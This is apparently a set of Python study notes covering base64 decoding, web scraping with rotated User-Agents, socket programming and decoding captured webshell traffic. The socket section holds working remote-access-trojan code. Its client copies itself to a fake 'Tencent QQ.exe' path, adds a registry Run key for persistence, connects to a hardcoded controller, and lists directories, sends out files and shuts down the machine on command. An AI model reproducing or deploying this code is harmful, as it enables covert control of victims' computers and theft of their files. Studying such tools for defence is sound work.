This note covers four small projects: 1) a base64 decoding script, 2) a web crawler script, 3) socket programming, and 4) regex matching (filtering for correlated traffic analysis).
1. base64 decoding .py file
import base64
import requests
# url=''
# img = requests.get(url).text
#img = img.replace('data:image/jpg;base64,','').replace('data:image/png;base64,','').replace('data:image/webp;base64,','')
with open('122.txt', 'r+') as f:
    img = f.read()
# Restore base64 padding: append only the '=' characters that are actually
# missing (-len % 4 adds nothing when len is already a multiple of 4,
# whereas 4 - len % 4 would wrongly append four '=').
img += '=' * (-len(img) % 4)
page_content = base64.b64decode(img)
print(page_content)
# file_path = './abc.jpg'
# with open(file_path, 'wb') as f:
#     f.write(page_content)
########
# URL encoding / decoding
# from urllib.parse import quote, unquote
# print(quote('参数'))
# print(unquote('%E5%8F%82%E6%95%B0'))
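Why the padding line above matters: b64decode raises binascii.Error when the input length is not a multiple of 4, and the naive 4 - len % 4 would append four '=' to an already-aligned string. A minimal self-contained round trip (illustrative only, no external files):

import base64

raw = b'hello'
enc = base64.b64encode(raw).decode()    # 'aGVsbG8='
stripped = enc.rstrip('=')              # simulate a source that drops padding
stripped += '=' * (-len(stripped) % 4)  # add back only what is missing
assert base64.b64decode(stripped) == raw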
2. Web crawler .py file
import requests
import random
url = 'https://www.baidu.com/'
#### UserAgent pool, method 1: a hand-written list
# Note the comma after every entry: without it Python silently
# concatenates adjacent string literals into a single UA.
UAlist = [
    'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36 Edg/129.0.0.0',
    'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0',
    'Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1',
]
########
name = random.choice(UAlist)
print(name)
headers = {
    'User-Agent': name
}
response1 = requests.get(url,headers=headers)
# response2 = requests.get(url)
print(response1.content.decode())
# print(len(response1.content.decode()))
# print(response1.request.headers)
# print(response1.headers)
# print(response1.request._cookies)
### UserAgent pool, method 2: fake_useragent
from fake_useragent import UserAgent
name = UserAgent().random
print(name)
headers = {
    'User-Agent': name
}
response3 = requests.get(url,headers=headers)
print(response3.content.decode())
print(len(response3.content.decode()))
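fake_useragent builds its pool from downloaded browser data and can fail without network access (version-dependent behavior, so treat that as an assumption). A small sketch that falls back to the hand-written UAlist above:

def pick_user_agent():
    # Prefer a fake_useragent value; fall back to the local pool on any error.
    try:
        return UserAgent().random
    except Exception:
        return random.choice(UAlist)

headers = {'User-Agent': pick_user_agent()}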
# Scrape an image
url = 'https://s2.music.126.net/style/web2/img/coverall.png?e04e8f94201676f3dd9a654e60f9e5e7'
res1 = requests.get(url)
with open('网易云.png', 'wb') as f:
    f.write(res1.content)
# Scrape an MV (music video)
url = 'https://vodkgeyttp8.vod.126.net/cloudmusic/83d1/core/4fd0/21664352decc901cbd99655066d83ecb.mp4?wsSecret=1eab8585b8740fa02ad40183f8e8e871&wsTime=1729415636'
res2 = requests.get(url,headers=headers)
with open('网易云.mp4', 'wb') as f:
    f.write(res2.content)
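res2.content buffers the whole MP4 in memory. For large files requests supports chunked downloads with stream=True and iter_content; a sketch reusing the MV url above (the output filename is arbitrary):

res3 = requests.get(url, headers=headers, stream=True)
with open('网易云_stream.mp4', 'wb') as f:
    for chunk in res3.iter_content(chunk_size=8192):
        if chunk:                  # skip keep-alive chunks
            f.write(chunk)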
# Baidu Tieba crawler, object-oriented
class Tieba:
    def __init__(self):
        self.url = 'https://tieba.baidu.com/f?'
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0'
        }

    def send(self, params):
        # Pass params through to requests, otherwise every page fetches the same URL.
        res = requests.get(self.url, headers=self.headers, params=params)
        return res.text

    def save(self, page, con):
        with open(f'{page}.html', 'w', encoding='utf-8') as f:
            f.write(con)

    def run(self):
        word = input('Enter the tieba (forum) name: ')
        pages = int(input('Enter the number of pages to save: '))
        for page in range(pages):
            params = {
                'kw': word,
                'pn': page * 50   # Tieba paginates in steps of 50
            }
            data = self.send(params)
            self.save(page, data)

te = Tieba()
te.run()
3. Socket programming (.py)
Server side
import os.path
import pickle
import socket
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(('0.0.0.0',4321))
s.listen()
client,addr = s.accept()
print(addr,client)
# print('''
# +++ Console +++
# Enter 1 to shut down
# Enter 2 to reboot
# ''')
# cmd = input('Enter a command: >')
# client.send(cmd.encode())
#while True:
# First message from the client: its list of drive letters
list_path = pickle.loads(client.recv(1024))
print(addr, list_path)
#client.send(command[0])
pwd = ''
while True:
    command = input(f"{pwd}->").split(' ')
    if command[0] == 'cd':
        if len(command) == 1:
            # Bare 'cd' shows the remote drive list and resets the path
            print(addr, list_path)
            pwd = ''
        else:
            if pwd == '':
                pwd = command[1]
            else:
                pwd = pwd + '\\' + command[1]
    elif command[0] == 'dir':
        path = ['dir', pwd]
        client.send(pickle.dumps(path))
        path_list = pickle.loads(client.recv(2048))
        for entry in path_list:    # avoid shadowing the builtin 'list'
            print(entry)
    elif command[0] == 'get':
        # Join with a backslash, otherwise pwd and the filename run together
        file_list = ['get', pwd + '\\' + command[1]]
        client.send(pickle.dumps(file_list))
        file_size = client.recv(1024).decode()
        print(file_size)
        sor_file = 0
        with open(r'C:\Users\wzf20\Desktop\client.txt', "wb+") as file:
            while sor_file < int(file_size):
                data = client.recv(2048)
                file.write(data)
                sor_file += len(data)   # accumulate, not overwrite
    elif command[0] == 'shutdown':
        client.send(pickle.dumps(command))
        if command[1] == '-s':
            print("Remote shutdown executed\n")
        elif command[1] == '-r':
            print("Remote reboot executed\n")
    # elif command[0] == 'look':
    #     client.send(pickle.dumps(command))
    #     img_size = int(client.recv(2048).decode())
    #     print(img_size)
    #     client.send('ok'.encode())
    #
    #     img_file = 0
    #     with open(f"{addr}.jpg", 'wb') as file:   # the .jpg belongs inside the f-string
    #         while img_file < img_size:
    #             data = client.recv(2048)
    #             file.write(data)
    #             img_file += len(data)
    #
Client side
import os
import pickle
import shutil
import socket
import string
import winreg
from socket import gethostname
# Auto-start on boot:
# copy this script to a QQ-looking path, then register it under HKCU ...\Run
src_path = os.path.abspath(__file__)
autorun_path = 'C:\\Users\\Public\\Documents\\Tencent\\QQ\\Tencent QQ.exe'
shutil.copy(src_path, autorun_path)
# Open the Run key in the registry (raw string, so single backslashes)
subkey = r'Software\Microsoft\Windows\CurrentVersion\Run'
hkey = winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey, 0, winreg.KEY_ALL_ACCESS)
# Point the value at the copied file (must match the copy destination), then close the key
winreg.SetValueEx(hkey, 'TencentQQ_AutoLaught BDB21234c34', 0, winreg.REG_SZ, autorun_path)
winreg.CloseKey(hkey)
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
client.connect(('192.168.1.205',4321))
# mess = client.recv(1024).decode('UTF-8')
# if mess == '1':
#     os.system('shutdown -s -t 1')
# else:
#     os.system('shutdown -r -t 1')
# Enumerate the drive letters that exist on this machine and report them
list_path = []
for c in string.ascii_uppercase:
    if os.path.exists(c + ':'):
        list_path.append(c + ':')
client.send(pickle.dumps(list_path))
class InmagGrab:
    # Placeholder, apparently standing in for PIL's ImageGrab,
    # used by the commented-out 'look' command below
    pass
while True:
    command = pickle.loads(client.recv(2048))
    print(command)
    if command[0] == 'dir':
        dir_list = os.listdir(command[1])
        client.send(pickle.dumps(dir_list))
    elif command[0] == 'get':
        file_size = os.path.getsize(command[1])
        client.send(str(file_size).encode())
        with open(command[1], 'rb') as file:
            for inter in file:    # stream the file out piece by piece
                client.send(inter)
    elif command[0] == 'shutdown':
        if command[1] == '-s':
            os.system('shutdown -s')
        else:
            os.system('shutdown -r')
    # elif command[0] == 'look':
    #     img = InmagGrab.grab()
    #     img = img.resize((800, 600))
    #     image = f"{gethostname()}.jpg"
    #     img.save(image)
    #     img_size = os.path.getsize(image)
    #     client.send(str(img_size).encode())
    #     client.recv(1024).decode()
    #     with open(image, 'rb') as file:
    #         for inter in file:
    #             client.send(inter)
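Both sides assume each pickled message arrives in a single recv(2048), which TCP does not guarantee once directory listings grow. A sketch of length-prefixed framing (hypothetical send_msg/recv_msg helpers, usable on either side in place of the raw send/recv pairs):

import pickle
import struct

def send_msg(sock, obj):
    # Prefix the pickled payload with its 4-byte big-endian length.
    payload = pickle.dumps(obj)
    sock.sendall(struct.pack('>I', len(payload)) + payload)

def recv_exact(sock, n):
    # Read exactly n bytes, looping over partial recv() results.
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('socket closed')
        buf += chunk
    return buf

def recv_msg(sock):
    (length,) = struct.unpack('>I', recv_exact(sock, 4))
    return pickle.loads(recv_exact(sock, length))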
4. Regex matching (filtering for correlated traffic analysis)
import base64
import subprocess
import json
from urllib.parse import unquote
# Extract the http.file_data field from the capture into 1.json with tshark:
# command = ('tshark -r tmpshell.pcapng -Y "http" -T json -e "http.file_data" > 1.json')
# proc = subprocess.Popen(command, shell=True)
# proc.communicate()
with open("1.json","r") as f:
data = json.load(f)
a=[]
for i in data:
try:
a.append(i["_source"]["layers"]["http.file_data"][0])
except:
continue
for i in a:
try:
b1 = base64.b16decode(i.upper())
b2 = base64.b64decode(b1)
b3 = b2[::-1]
print(b3.decode())
except:
print(i)
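The section title promises regex, but the script above filters by JSON field. An alternative sketch that pulls hex-looking payloads straight out of 1.json with re (assumes the payloads are plain hex strings, as the b16decode step above implies):

import base64
import re

with open('1.json', 'r') as f:
    text = f.read()

# Match long quoted hex runs; adjust the minimum length for your capture.
for blob in re.findall(r'"([0-9a-fA-F]{8,})"', text):
    try:
        print(base64.b64decode(base64.b16decode(blob.upper()))[::-1].decode())
    except Exception:
        pass   # not one of the layered payloads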